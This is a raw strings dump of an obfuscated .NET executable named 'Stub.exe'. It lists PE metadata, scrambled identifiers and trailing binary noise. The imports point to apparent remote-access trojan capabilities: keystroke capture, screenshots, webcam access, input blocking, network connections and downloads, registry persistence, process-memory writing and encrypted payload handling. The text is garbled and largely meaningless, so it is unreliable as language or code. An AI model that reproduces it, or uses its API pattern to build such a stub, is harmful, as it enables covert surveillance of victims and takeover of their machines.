!This program cannot be run in DOS mode.
`.sdata
@.reloc
s7
U fV;
sI"\;I
]OEi;
v2.0.50727
#Strings
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
mscorlib
System
Boolean
RuntimeCompatibilityAttribute
SuppressIldasmAttribute
AssemblyDelaySignAttribute
System.Reflection
AssemblyTrademarkAttribute
String
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
ComVisibleAttribute
System.Runtime.InteropServices
AssemblyKeyNameAttribute
AssemblyConfigurationAttribute
281071e8-7c0b-4cf7-a499-5678132f5749
Stub.exe
<Module>
JEAJFLDHIJPLHJAEAJEIFEMEEOOFOLGDJEBN
ODNKNCFDHHPJPCMOFFIIHIOEPAPDAKPENFKF
QVC40sBrPL7wjWTbku
2nvhq7CyiBLjoZCcAh
Object
ODLKPHMBAAAOEGOGIKDHOGBLOEDCCCGGLEFL
ELLCEFEDFECJMOLOJNEBJJCMDEAHBBOMBLGB
ApplicationBase
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic
PPHAAHDIJLHOFKDBFNIKLHEPMGMNDMPOMBOI
Computer
Microsoft.VisualBasic.Devices
MNBCOJMJNEAJAEMKOEPADAKCDPHAHABBKAGL
AMEFEAAIFNMDIHNLPHKMCMCEOGIEGHGAEGFG
ONKHOLBLDOBKEEDKPGLNLAGFIICIHJPLPHPB`1
MKOLMMELBPHCMNIJNLFNECKEPGOLNOHGLDPO
JKNPJJGHFIDBNHLBDOPDNGHPLMKLDJGJGKOC
KCMOEMHLHEDHCFBJJNKAEADDLFLFHEGJIEOP
EJCNLOIHIPPHEIGBDHDLCKLDMHMAMMDDOOPJ
NGGNCEFBFGACEINLFDHHFNHEHIBDPHGOAPPN
HKIEFMHLPMDEBKHFJKOBIJDBEGCOPFMEANGE
BLMIBLOJMGKGEJLOIONCOAOCPAEFLLIACCNL
CAKOEDIPBAHFPOFAIMJGHANBCKABADGMFJJH
<PrivateImplementationDetails>
__StaticArrayInitTypeSize=512
ValueType
__StaticArrayInitTypeSize=6
KAPNONHPPEPJBGGCPBCPLJDFIJKCAECHIBBO
LLFCCAHDCFBKKDALMCELALIFGGJDMBNKHJIP
LBOKKIHHNIFEDNFLFNNBADGAEEMBEECGHIHK
JKEPNFGJMBIPECGIOCBFAKEDGBGKNPPIHNOG
MulticastDelegate
IEMMNLIKDEGLMDNDPPLPHMEJAMPINEIJKPPD
CMHIINFBFKCCFJHGBHEDIKIABCPKIJIHEKIN
ICBENBAADPGIKHNJLADFGMAMLNHOOOBKPCCD
<Module>{9032EE49-D66D-4779-8D35-FFA4039C62A9}
JEPHHCHKPLDAMPPFCGLAHLNACJMNDHGIEBFN
DPBGCPAIIGJJJLHLALLKDIKDODLCGGDGBEIO
SFU4mbT3GMret7THonf
FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM
LLAODMGKHMCDIPMCCKCDKMLGLOFFFMGEKMBE
MJJJGJMDOPKGIKBELONGOENDFLBLKJIEJGHC
Attribute
EGHFGMCBLAOKCJNCHPKGJDIPCNFFMCNNIHPL`1
NEJBNFMGNNDEOHBADCDNBHGCANAGKIEDAMIG
BFJNIBAAKMIKLLOHDGCLKPILLMHIMMCHMBOL
IJBCAFGKKBEFMNEGPPDKBEJIAIFOLCNINNPC
AJMMMELFEBFOMGGECHOLCMIEIBCJPMEPFDEB
ILMPHEAFEFNLAKABDOJLDPGFPOOJLIKPIPOP
KHNAALANKPHHCNCGIMOIHGGMBBIAGPKOJLON
HAPPMFBGBMLFDCPKHNINAGLFEOJJNMFGENGE
IIKBCIJJOLINBJMCFLOKPPOMCEKJAOJEMBFH
GGKALOJDEKMDBEPKIMLEOIAPJBEFKPPFGHDK
JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE
AHGBLCNAJPJLLADPGOPGLGIFABKGDICCEAGA
HOELGHDMAEKKOENPHODNHGEBHKKGEHLJFPMM
GCOAALNKICNHMHFNAPOEJBBBDAGKGODFLEFE
<PrivateImplementationDetails>{11A73A72-AB5B-4A55-AD35-F5690FD5183A}
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=64
__StaticArrayInitTypeSize=18
__StaticArrayInitTypeSize=15
.cctor
AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL
DHDDMPMBFOFEOFJJDLELKJNIFNHJPJLKDAFM
HMDPOEFDIBJKGAIIKODAJBEOOKPIKBLDDPLL
OAPNLPHACOGJHMMJDDHOOGOADFOAPDPNJDGI
JNHJPECJIDFKOJCDKIMOHALGHDBJGFMMFHGK
EJIGEHBLIJKPPHHDNMECABEJLKPIOICCBOOH
FKKADFBBHJPGHDLPHLBCOKCFMACODPIFKMBB
BOOOGKPNOFMBFLHADIAJLGCAINFKHENEJLFA
DODCBNKABNMEICDGGKFCFJILPHCIDEHMGNKL
ABGKBKMAKGFOCMFGHCIMABPOLODGOOHGMGPO
BPOHHJDOMIPADPNFJKGOMLHMIKKPLKMMEOEC
EEEECLJDFPOPEADFCHNHNBBKCPKEDJEGDEPD
DJHILNMMFMFCHCBEEFPEHJNDOPDCLKPEDJGK
OMKHGPPJIPMJNDJOLKCEHMHJEAGFLCGMKPDJ
LEKMDMGJACGHAGJPMLHOAIELCFFCOJDBDELC
BFIDFFMDNIAHCEAGCGIJDOJCJJDEKDKMFNDE
Equals
GetHashCode
IOONANPGCEFECFHOBOOFJAJFNBFLINFHPLEC
ToString
MFCGGDDNAOFMJGEBCHHGEMGLCDJHECPEJIJK
instance
Activator
CreateInstance
MANOPFDPCPIAFIBAPDLCIKJNICGIBIOMKAPD
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
FECPMMMHHAEDLHMMJDHBJMPFJOEANCEJCCPJ
JNCDANONOMNENIJDCHDIJOMBJHOBOJDAMGOE
BGLGFOIMHHFHHKMCLIBKGBJDMOCAEKKCMMDD
KCIDPPKJINFMIGAOCIEMJKABCBOKLFPMEKPG
Process
System.Diagnostics
EKKOHMNKJBKFLBFIDMJLBEAHLJBODNFACDHI
System.Timers
Double
ElapsedEventHandler
IntPtr
GetProcessesByName
ProjectData
Microsoft.VisualBasic.CompilerServices
EndApp
add_Elapsed
set_Enabled
PEIGJFBDEFBFLGLPIAJKKLGGELONDDBHPKGA
KPEJJIMGLEHJKAHMFPJIFAFNOFBIIBMPPNBM
INOJHJKCCCIPJHNIILOINDBNFCPCGDDHHLME
EKEFJBDAMLDEILOIDHNDNCLLANFEEACBJFGE
GLOCEDCEDIFOIFFEKJDNLJEMJNBIMLGKAELG
ONDOFKGFKAMMIAIFCHAOAAEFJOFOAEEODEHD
LPIOIPGAOHCCOJCMHONIDADJBGFJBKLEEHHA
PIFLIHAFJDGHIGPAPCNBKOFHJOAEFMBLDMMG
NNBMHMOLEMJCGFDKGJGLHJAHKENNENPBJAEF
GMIJIONOLKOBBIOHHAPGPFGPFLAGMJGMKFFJ
PNKAEDALCEHKPNNADHCEDNJLIJNIIKMGHAEI
CMCCMCCMLINGHMMKBBICEIELMJEBANJMMACF
FNBLAPFBHINMKKBCKPKDAGIBFOMEENFMGFLK
BMDNONFFGPCFMFHMODGACOCLNFJHEEOJCJJG
BKIOJLHOKAAMIBCFLDHNMDPCDBFGEMHCGKJJ
ONDGAKODFNJMGBKMKMCPOJFAOCJJKMKAPKNB
BMEJAACEGBOFBKCGPAOEHEHDIGHPNGEPHFDI
CCHEKLJBLDBMNNLLJODBHLKNCGNJNAFICBFC
JJJFIFJAAKDIEBGLOJBCNIAMCDJFIKDCLCBL
MPHDDGNHBIEPJCMIDJPIMEPKMGIEBNCFOHAC
JFOCNLPHCCOIDOBIPIHNNBOAGCJAADGJGFPI
HFBCCBNDJCGHAKPBCMFDPPAJOIMGAKKFKJNO
CHFGCINNPOAMJGJLOCBNOIDLMKOACHGHJMLI
GECFJIGGMJJKBCADBKKALDLFGLOAOJJPEELE
NCIIIFOLAOPAEPHIPADBBKJKANEHGIHGKBBB
GJEGIDDCJGCJAOKLCCEKBOGHECDIJGBHLABD
AAJJHJPCEHGGCIBDCKAFHJBCPKLIDDBNHBML
FEIFMCPPCOAFJADFFPIDGGNKNICMEIOAMIII
LBEBGEBIONKDILIPGKHBNJHKBGFJJJJIOFPM
PCOENFBHJHEGGOOLPOADEIKGIDKHGDNMKBPI
ICLDBMHMJBCPBNONELFDHEMLLCMMEOEBLPLO
JAEEEHGCDNKDGMNKAMMOECALDLIFBGDPCIKJ
FMEIDCKGAFNFHOAJLFLPENPNIADFNJKEHGOC
NLDKOKCKNKALCFIEJICCLBILPJMNNHNKDENC
JHPMFNABLCMLCODIPIHHBECCAMKPDGEIOBHL
MPOKDFNBNNFCLJOEAFKBMCOBJGGHEFODJDGJ
LHDLHLIHOMJKGHDKHKELNHGANNEPHKMECODM
JNCENCPGKKOBDLLBECIMIMBHIIIIJOBCPJMJ
DPPMECCGDCEAFDGLMNJDPCHDGDNLANCLPEEH
KJGMGFCHCFLHMBNDAHNMHFHDAGEOMHKAMKOA
APBNFCEDDNIABAGJLLGOHLBHDMFNCAEIKOGB
OIIGDIPLKFCLLLAJDCJBAHEEMJNFAMLOMJHI
EMOMPCLLLHEGOCLAIDCFCLBNAKGEJKGAHCCG
IFLOMNMJENCEAOJMKCOAAIIOPLPBHHLBNGNN
JPPMHMLLPHALNLFEDPOLCHCDNIAEPHFIDMPN
DGBPFINBMPEMNIFHDOGNLLLJKEKFJCDLDCHN
PKIBLJIIOIDPHABBIAGONBMMMNCOBADODOJF
FileInfo
System.IO
MemoryStream
ThreadStart
System.Threading
Thread
BBJGNJJJGPMHIJCFKANLBOLILECAJDGOBDON
KEHHKLMADEKNOJCBFPABEGBBNGHPLPOAEALI
APNKDMNEHOHDEJCGFNAPHKFNADCKPIIJEGGA
BOIGIHFFKNECFGHLPOJCEGAPLMLJPKMDIJGE
Rectangle
System.Drawing
Random
get_Height
get_Width
JAKDCOEDFGDLIDHBGCBOLAJJFKJJCCJEOBJP
GLPINEODJMFDIIJAMIBKFNEAOIFHICGMFHKL
GGPCDFGIFPEOBHJHNGFDHAFMBJBEGHJCLPKM
SolidBrush
StringFormat
Single
IDisposable
BPGMFLBPFFPDMFAJJOOAHDJHKDANOANFJLBG
Exception
LGOEHECKLEEEJNJKDAKLJHMMPDFNDEMINIFM
ANIONCNGAPMCMBLBGFCIONDHKMHMGMFKPAPI
LIALELFBHIHGDFNFIJOGHCAHPMFMFFDAJFDB
BlockInput
user32.dll
HANPAPAKPNLPPOBHMINAGNMEHHPOMGMODOEJ
capGetDriverDescriptionA
avicap32.dll
AKFNNKIEOCGJIEIILLLKMDKJHJLJLNDKHKHE
DirectoryInfo
OKNBJNOKJMGCAJFHEHDHIOKKAGBAELIMHKEJ
WebClient
System.Net
TcpClient
System.Net.Sockets
NPFJDPABFGFBFNJPKBFOOGGMEFPJDAPKNGNL
KMGBENACECEAOGDLHEOMFPEODADBJECMBGOH
CNNNOMIJOOHMFFADPFEPHBHLNFAJJDEHBBJH
CABDCPLGBLIPAFMMDKNNMPODEGMJLIFMGJIA
NNGPGFAHCEJOOFAFDOAMBBPGLBCJINDKLLLH
GetForegroundWindow
LELJJPEOEMNLELIBMLOPJABNMBCMNDBCLBCK
GetVolumeInformationA
kernel32
HMEECKFMNCMAIBLCDBFIGKKMCPIJBPPPNKKO
GetWindowTextA
OHMFBACBANEAFCCMOGLPPBCAGJMFMLIIADMC
IEnumerator
System.Collections
IEnumerable
EIEFOMJKIGGIPLALHHOMHFEFOGNONGIDEEIC
GetWindowTextLengthA
GLIIPJEBOODBKCDPBIJFIFFEODLONIMOKJPL
GetWindow
BEHINGIJCLGAJDMGMNICFNPOJDOMBDFNKPHH
UInt32
SendMessage
POLOJBAJAFMELCHHMDJMMCJCHAGHLFLJOLNJ
OLHJEPAONILDMPHELGJPODIOEHNFMDPKJCLH
DCCPLPNKHBAAINDJNJHBFCDNOKOAGDCJFMIM
AMLIJHIEINFKGCHCBFKKIMFLEHAFIGMBBGHD
FindWindow
EMMGHGJPFNJNKDHECHNHMEODDFBNFNMAHLOI
ShowWindow
GODNLJPOAIJIPPKEDNFFMOPLEDFONEIEEPDD
mciSendString
winmm.dll
OGJLDEANNCDFEFGIDJKLKLBBIBJBONGDHNPP
ReleaseDC
KMDFELCCOJEPMCKJJBNBBJGDBFNHGGCJEKCD
CreateSolidBrush
gdi32.dll
DMKOPADCHBEGKFCLCEJIGPBNDGGLODIPJPLJ
KERNEL32.DLL
CEBFDFHKKEJBAKPAFCIPIIOEBDEFCFPOPHMG
PatBlt
FLPGCCNPMLCOFMGIDJMLGHLPCIINGPOIAGLN
BitBlt
KJKAPAPKOBMOKEFOHNOBBBDDKLLGFODEFDDI
StretchBlt
MNKADHCPNOCENEGKIGNKIHAFDFDMLAJKLLOH
GetDesktopWindow
BHDJGOMKPOJJFAFBBPAACCOIKPBELENLKNFO
GetWindowDC
FIOLCEOHHAIKLNEMNLEJOHMABENHDDPNJEGO
SelectObject
EKNIHNHFJLHGCHEOBODCMAHHMCODNHHHMNFN
DeleteObject
IGJMHPGCIEGOIIDJCBMFMDKKLNCDLEKKIEBA
Bitmap
Graphics
PixelFormat
System.Drawing.Imaging
ProcessStartInfo
GKAMBIOGGALPJONFAMNIJEOIENKBIMAIOOED
DateTime
get_Date
JDKOGLBMGIECDOPIMAOAIJDLGFAFCGDMMILL
FileStream
FileMode
PEOFIFIJHOCAHDBPKBMMJELKDBMFKOGGBJNI
SessionEndingEventHandler
Microsoft.Win32
NJHHKADGBJNLMNKGAOKNHOCDKCDLAHEHAIHG
MD5CryptoServiceProvider
System.Security.Cryptography
NMAFAANIHINEKMNGJKAAGDIJDOJOLJPKEEIP
NtSetInformationProcess
ELECLGJFPGKGFIFAKFGFONNJJBDOLMLNOLCP
Module
get_FullName
MMMLKOFDLBMBBBGOOPOGFPJFCMLAPMGIIOKI
AGEKKBCGOLFGDMHLDEKGJPPGLICHKONEAMEE
ParameterizedThreadStart
OPJPFGFPGPDOHJKDMFFOOABCPFENBMIGIJAB
HFIBODNCBMJHBHIMEDJIIAAHBCEMCPJOFABC
OKGILBIHJGCKMPNGEFJOMEKLGBGGLFBFKMFC
HGDIBFOIHALCEADPGFKBIGILLJIGBCIMLHKL
RegistryValueKind
NLKGCLIGBEPDKELJKMCDNIENLEOOOJCGKPKK
GFDFMODGDIALAEMFKFDCIFICLKPNJDBGNCGL
GZipStream
System.IO.Compression
Stream
CompressionMode
Conversions
ToBoolean
Assembly
GetEntryAssembly
get_Location
Screen
System.Windows.Forms
get_PrimaryScreen
get_Bounds
Cursor
set_Position
Operators
CompareString
FromHwnd
get_Red
StringFormatFlags
set_FormatFlags
RuntimeFieldHandle
InitializeArray
NewLateBinding
LateCall
ChangeType
Dispose
op_Equality
op_Explicit
Strings
get_Length
SetProjectError
ClearProjectError
Encoding
System.Text
get_UTF8
GetString
get_Name
ToLower
get_Directory
get_Parent
DownloadString
Monitor
set_ReceiveBufferSize
set_SendBufferSize
get_Client
Socket
set_SendTimeout
set_ReceiveTimeout
ToInteger
Connect
ConditionalCompareObjectEqual
Concat
Convert
FromBase64String
ServerComputer
get_Registry
RegistryProxy
Microsoft.VisualBasic.MyServices
get_CurrentUser
RegistryKey
OpenSubKey
DeleteValue
ToBase64String
Interaction
GetObject
LateGet
GetEnumerator
get_Current
MoveNext
GetValue
Environ
Conversion
CompareMethod
CreateObject
Clipboard
SetText
MsgBoxResult
MsgBoxStyle
MsgBox
ConcatenateObject
get_Chars
ToArray
DownloadData
VBMath
Randomize
GetTempPath
NewGuid
Replace
WriteAllBytes
get_Message
LateSet
CompareObjectEqual
OrObject
FromImage
CopyPixelOperation
CopyFromScreen
get_Position
Cursors
get_Default
DrawImage
ImageFormat
get_Jpeg
WriteByte
FileSystemInfo
AppWinStyle
Exists
Create
Delete
ReadAllText
set_UseShellExecute
Application
get_ExecutablePath
GetFileName
set_FileName
AppDomain
get_CurrentDomain
get_BaseDirectory
set_WorkingDirectory
set_Verb
Contains
Environment
get_MachineName
get_UserName
get_LastWriteTime
get_Info
ComputerInfo
get_OSFullName
get_OSVersion
OperatingSystem
get_ServicePack
SpecialFolder
GetFolderPath
RegistryKeyPermissionCheck
CreateSubKey
GetValueNames
ReadAllBytes
EnvironmentVariableTarget
SetEnvironmentVariable
SetValue
get_LocalMachine
get_FileSystem
FileSystemProxy
get_SpecialDirectories
SpecialDirectoriesProxy
get_ProgramFiles
Directory
GetLogicalDrives
GetExecutingAssembly
Command
SystemEvents
add_SessionEnding
DoEvents
GetCurrentProcess
set_MinWorkingSet
ConditionalCompareObjectNotEqual
HashAlgorithm
ComputeHash
GetModules
GetTypes
EndsWith
get_Assembly
get_Handle
get_Available
SelectMode
GetStream
NetworkStream
ReadByte
ToLong
SocketFlags
Receive
GetBytes
DeleteSubKey
BitConverter
ToInt32
value__
HOMKJFABKNAHOECLCCKNMODJDKGMGMECKJPM
NFCKHNABNOHAKGJOPPAJCAEBHJLKOLJDAIKF
EMDCPNFFIOCKDLADLPFAMLEHIEANGJHMDFDI
FKLHMFAFGBFLDCCEEOFACGEJGGDICMLEKGAA
HCLKFICBPCOMNAHGJAJLNALKAPIJMAPOMKAP
JJCBLLNGLMAJLJFNDJHCDGBEPDOCLLMAPGJN
BMAOONLNHDLEBDFPKBKLHPDKCBBBMHJMKAAD
HLMAAMIBEFINDOKFJAKKDAAKLBENILAPJBJB
FGCANFGKIIJOBJJKODEOGNKEIEMKLNLIPKLF
CreateFile
ECHMBGFMADDHPGGJLEPKIBLBEMIHHLMAOGLA
WriteFile
CreateProjectError
03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
462E13B612D5A6C3EC8AB25DF69755AD20BF51EF
fieldimpl1
fieldimpl2
fieldimpl3
fieldimpl4
fieldimpl5
fieldimpl6
fieldimpl7
fieldimpl8
fieldimpl9
fieldimpl10
ModuleHandle
ComputeStringHash
PNDHECALACJLMHLLMFGOAGDPOMDINBJMBOBO
CGJJHMMJHEBBJFAIPFJDFJHAFPEOGBEPEGEK
List`1
System.Collections.Generic
LADDCHAGCNPPABABACACDEMDBOIDIMCNEJJJ
EnableWindow
EGKGMCJKLJMOFHMBLPHCKBOHALLFBHFNMPNP
GetWindowThreadProcessId
NHMNPBIIFPFCEIMAMIIBAGGAALCLNPKLNALM
GetClassNameA
user32
SendMessageA
StringBuilder
GetWindowText
GetWindowTextLength
BCDNIPANKOIMCOAHHDJMOFKFIPFFGDHPDGDN
EnumChildWindows
AABMBABCGKMDAPKEFBOLAHBFHEHEHLIMEJGD
JCMFMEKLPEHCLONMPIAFMKGODFFGIBGCPKOD
get_Item
LLOHLIAODDBPMDAIEDACNFKHKONFNCMHCOKB
get_Capacity
GetProcessById
get_ProcessName
Remove
get_Count
BeginInvoke
IAsyncResult
lParam
AsyncCallback
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
GMIOFLIEKPEKEAMDHEGNIKPMPOJFCCNEBHBD
MDAIFMHIMJDJFDNPMHFLFFIOFLFOCJGMOCOM
CCGKMHNAKFDPIODMJNDLGFECLDEAEBCGIKJG
IMLDAPEKBKONLDOLLLJLPBOJOKLDGCHBLHBJ
JEEGDHEJPADFPBEEMKHBIAIGJNDOEBKAAJMJ
IKHAILMEBHELNLPHCGAEPIECDAGGHBBDPBDI
FADKEODFNDMEEGMDKJPKHDPFDENEAMFELEMC
LDLBHFMJGHMFNOBOBCHNPLJOHCKJHNPNPKAC
GetAsyncKeyState
IKNAKKLIBKNKOBGGCPFKOBNEDBKCNJJLGPDK
GetKeyboardLayout
GLLIPLBHNPDHAIMIAMLFJPNHAPGAACGOAAGC
GetKeyboardState
HPPMBAOFBEGOMJLBKOBADOGCLPKGBJAMCLJL
MapVirtualKey
JHLAJLNIKLKMBKJDFPNKCJNKDGLFLJELDAFM
ToUnicodeEx
GDILINAFDGNIGFNHKEECHMMPHMDPGHACHLBG
EPANMOGINMEEDMDOFPLNKIKIBBDLLBFIKAPP
get_MainWindowTitle
DateAndTime
get_Now
get_Keyboard
Keyboard
get_ShiftKeyDown
get_CapsLock
ToUpper
get_CtrlKeyDown
FMMMELCOGIHENBGNHCIBJCOPHBPIBJNMNKHC
NOOJBGNMIOKBEBDBMCNJLCEEDCCPCIBAEJOE
KGLCCIEKCOIMNLGKJMOGNIGLLMFHCFMFAFMI
typemdt
FieldInfo
MethodInfo
GetFields
ResolveType
MemberInfo
get_MetadataToken
ResolveMethod
MethodBase
Delegate
CreateDelegate
get_ManifestModule
object
method
callback
result
NDEBKNEALPNFLPAFLMFDJIBKHKFLBCADBFKP
MBDCGMELEFDMPMMCBGDDFJMFOLFMIIHGBFCA
DHHEKAAALELKGDMGJBEMBHMOGDHMDNCFKAAC
BPOHLBBCLAGHCJPMACHILIDLNNGAIMOOBMIK
BLAKAHAOBEBHGCANFMJKBPJOCHCNEBMKNKHF
CAIILNNBNCMDHIKBPILOFAGKJAAOGFPLBILO
DLAHLDIALDJAKMLBAGDDIECKIPFDLFPCNBEJ
KJBGDHENMLBEDNCHMHNJNLPHNBDOCFJFNIFL
PHJOKCADMFNEFCMHNIBJPMDJCKGPOJAGOADH
HPKMLEHOGFMKOIDJCMEEBGHDDKCIBPALGOJC
KFOFBPAMNFPMHEBCEJAEHBFGALDFIMHJNOGN
FHCJKIMLMCAOAHLKNALJIKBKELEMNCECPKPC
CFKANGNKNBNMBPFEJDEHGBLOFPNDEHLAOOJJ
MGKHNCCLDFHJKKCLLFJELOOFCLAKKDOJPBMI
NEJKMPCBFFGBBFDKJCKJGGNEDKJILIBENHNK
MNMPBAECCFFILGKCEHFOMHELOAGDBGEECIBI
BEHGBDIFFIMEDDCEIPKCAEGMIFBLGBOPOOCO
KOEFKDFEDINAMGCPKFGBGGCIAIMCDEGKGODP
IIKLLMGEHKHLGIDKHEPOGPEDOAEFILAPOGBM
PJGFCBDKABCEIKHFEMLDAPHILEOGFHLJGIJD
DECAOINGJPBBLDOEDKHHIFGHBDOIDLKHMCKP
CMABCMCPOLJCLBOPGBEIOGBIJLNJPGPHOHIC
SortedList
Hashtable
AONCGCMKIGGJJIDNFBKLJFMNMFDGLPKIEMEH
BinaryReader
CryptoStream
ICryptoTransform
RijndaelManaged
CryptoStreamMode
AFAFKENIMCLBFBHNEJHNNEBMKGCKCCDDKOBM
KBDJIMOOIGBDNGNLOPJDPHLGKFMNEJBBCLOH
get_Unicode
CCHNLGFKBMIEHNAMNPNBEDLFJOLJEFCMPJLH
RtlZeroMemory
kernel32.dll
DAFHOKEIDDCADPJIPMDIBFLLIOOMODLGMEDC
VirtualProtect
CCNKPDPEGMIPJEEMGOBMECACHOIOJONAMLMN
FindResource
NGNELBIBEEBLGAPHHOMFPBDILNGOPCJKNKGA
UInt64
get_Size
Marshal
AllocCoTaskMem
PLBBEHFIEDPHCEJAAELNJEJHMKPKCCIEEMID
PIHMIOMHPDBLJBIINOMMGIPGMMCDOGOCENAF
ToPointer
AccessViolationException
NullReferenceException
GPHPGDEKEGFKCFMMLBKNNBBCHBLAGIOLMEAN
JDLBFPFCBEHJMKMBCHEHOPADNFJPHDKJDNID
KEEHPJLOGKLFNLFMPEDJFCINGPKIAFPCHECG
JPMCKFFCCLCNHDNBMICBKPGNLPFKHCMGKGDD
EDJDBKJKLDCFKLJPBFFKIGEBIEMAHNIOMNEN
MIJHHLLECKHEACMIBBKJFNJHFNBFIGBPGGJD
RSACryptoServiceProvider
set_UseMachineKeyStore
BJLFOOELDGLDKFNNOENMGAADPMCOJNBAPBDA
ProcessModule
ProcessModuleCollection
ToInt64
OFLJFCADOFAAHEBBAPACKIPAMLMADGHIBKHF
GetName
AssemblyName
get_CodeBase
GetType
GetProperty
PropertyInfo
DDEODAKPGMAIFNAOFKEHFIEDIGAFIABKMFHD
LoadLibrary
FFKFGPCALILIOLJIHCLDOAPEEAKKICMJNLMI
GetProcAddress
JFOPOGGJFDLNIICOLBOECGNILMBNCKKIMMDK
WriteProcessMemory
FGLJEHJEIFJJADCBFLOFLEKBBOBDICBCHBAL
ReadProcessMemory
KLGBLMNFBMFGDCEOCKEHHHJADOFOCCPEGIML
AEDJNGPCHOHCNDAFMJPFGLHJBJKJJJPLBGED
OpenProcess
GECJIBDHHHKAAEECAEJPIHONIKDHHMJJGDMM
CloseHandle
IANMJEGCGMDLLBIGCICPAPCPPEINEGGPJMLG
FileAccess
FileShare
ACKCFNKNBFKJBECNFOFPPDOKPEKDNIAGLAIC
Rijndael
SymmetricAlgorithm
set_Key
set_IV
CreateDecryptor
FAKENJCGOIDBLGBKGCPJMABNIEJJKFNELBAL
BNANMMALCLFEJDPEFFJBEHLPHNOBDPDIHIED
BLBPDHDCCLBFHJBKEMFOPJFOOMJKMHALHGOG
HFDJLMIJPNOJDLACNGBEDEBJLBMBGFENMGOE
ACLPGADFCHALCGGNAHCDOOOGHHGFNKJHPBJN
KGOEFJODIKKNIFPBIPHFCNNELKKABKHOJJKO
NGLNBDOALDPAJGKNNKCDIICCOPOPCIPKEBPD
FJMPOKAKIHMMCBLBJHCBKFGCFFFKAJDEIKHH
GADBCFFEJGPLCMCLIKKGBIIGEBJMBLKOCPKI
NIGBOLHENEBJCFFCJBBFPOFLAKOEBLAALDMD
GetManifestResourceStream
get_BaseStream
ReadBytes
GetPublicKeyToken
CipherMode
set_Mode
FlushFinalBlock
get_MainModule
get_BaseAddress
GetHINSTANCE
GetEnvironmentVariable
ReadInt32
get_Id
ToUInt32
WriteInt32
GetDelegateForFunctionPointer
ReadInt64
GetFunctionPointerForDelegate
get_Modules
ReadOnlyCollectionBase
get_ModuleName
get_ModuleMemorySize
get_EntryPoint
get_Method
GetParameters
ParameterInfo
WriteIntPtr
CreateEncryptor
classthis
nativeEntry
nativeSizeOfCode
PHAOPPPBJGLAAALNAHHAIEHKKDPHDFENOLNO
IKEPAIDHOOFMBGJJJECMDEGCHCLOLADKIIAF
HOLJABKAKECAJNEGOHJDPNGEPOBNPPBMCIGN
GetRuntimeTypeHandleFromMetadataToken
FPDKAFAMOEFAIKHGCKEOBJJMNCLBPMCAOLMI
GetRuntimeFieldHandleFromMetadataToken
get_ModuleHandle
BIOGIKGAGOMHPKAAMIHEKKIIBFOPNDPKOHNA
GMFBPGPPGOBNOOPJOGNAHLOAPCLMLEBHPLEF
MIHHHFJLCNLOMKDONLAGELMNHMIIPJNHBCNA
ResolveEventArgs
ResolveEventHandler
add_ResourceResolve
NHAIDFIDEJDEJHBJNIBHFHIBFAMHHDAHFHKC
GetManifestResourceNames
IsLittleEndian
FKEANPIBLGDNGEIAJGOPNCPNCONCCIFALMBK
FANFIPPDDMMLKBGEJJBJKKOEGELAAOJPIAFG
FNBAGONJKNJEHDBFJKCAJANFJACBBAFFICNI
KJKLCFNOHLABGOPJKFCMFNKEKMKIPBHLNPLK
CDFLEIGHIHPMMIPJCKDDMIJLMIDGLNFJCDJK
OEGGILBABMPAFCAPLGDEHPBGOLMPENPEEMLJ
HONLPCLCHPMJPCLLBAMHPJDDDFCCEFPEEEAC
KFNEJLBAHNJNEKKFFMAMAJGCLALPNHAJHILK
HPCGGILIPABIDJEPKOLHIDJMBJMAEFGAPFFO
AHDEGKADGBOPLBMFINONMPMDBNPMHHIGMOPM
KCBIMIEILCGAGPBFBDHCCCAGNILAKCGMPGOF
NELKCALGNKBCFDONKIEKOBMNCAIEMHKMJNAG
LIDPFMFFNFPNJBJDPLDAGBLOHALEKBCECHCL
ONJFGCDCIFPBLOIIAJHMFGBNLNFGEEGMLDCF
JKPMJCIAIEICEBDIEFBAEIFDEEIAPPGADAEM
NPFKJABGGKCIJPIDLJCCLGGKAMBLOGACPGIH
get_ASCII
$$method0x6000023-1
$$method0x6000023-2
$$method0x6000032-1
$$method0x6000054-1
$$method0x6000277-1
$$method0x6000277-2
h2QN0JHDmkRQp7QcpL.ULmfQSI6O6eMaNctp4
4sTCIyDwCXmwgMpnZA.QOIy8xEpl3c9ypGd72
vujMuUBWwOF1C0rLWX.Vpu5AECPEtHS3mIJMj
KfSYn6FmC82DaWHi5c.NeE3O4G0wCnpNbquqf
GeneratedCodeAttribute
System.CodeDom.Compiler
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
DebuggerHiddenAttribute
StandardModuleAttribute
HideModuleNameAttribute
HelpKeywordAttribute
System.ComponentModel.Design
MyGroupCollectionAttribute
CompilerGeneratedAttribute
ThreadStaticAttribute
DebuggerStepThroughAttribute
STAThreadAttribute
UnmanagedFunctionPointerAttribute
CallingConvention
FlagsAttribute
WrapNonExceptionThrows
MyTemplate
11.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
LLAODMGKHMCDIPMCCKCDKMLGLOFFFMGEKMBE.FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM/MJJJGJMDOPKGIKBELONGOENDFLBLKJIEJGHC/EGHFGMCBLAOKCJNCHPKGJDIPCNFFMCNNIHPL`1[[System.Object, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][]
4bY.@7
QTMg8Mlyp
><L(RY
76F5W@
Wa7w&`
K[;$1]
OdO~y3
P5ukd
%Oe~aj;
EvV(_4&[
Y>*FA9
<)JIMz
hB`dW!
GC^jVL
/.XP'-
*`k>Rs
W?ZG8o
5B9SNe
sbedL-
oim!,p
k@ REi
{4Sbst
A_(.B)Nb
[kx_(x
3x6SH#&
z46w}4L
A*^qw{
io@lQq
<V3-}5
[d2?>S
ZBrAa@
#f&io;
G5aCOb'
fRg4(fM
=B.(WVs
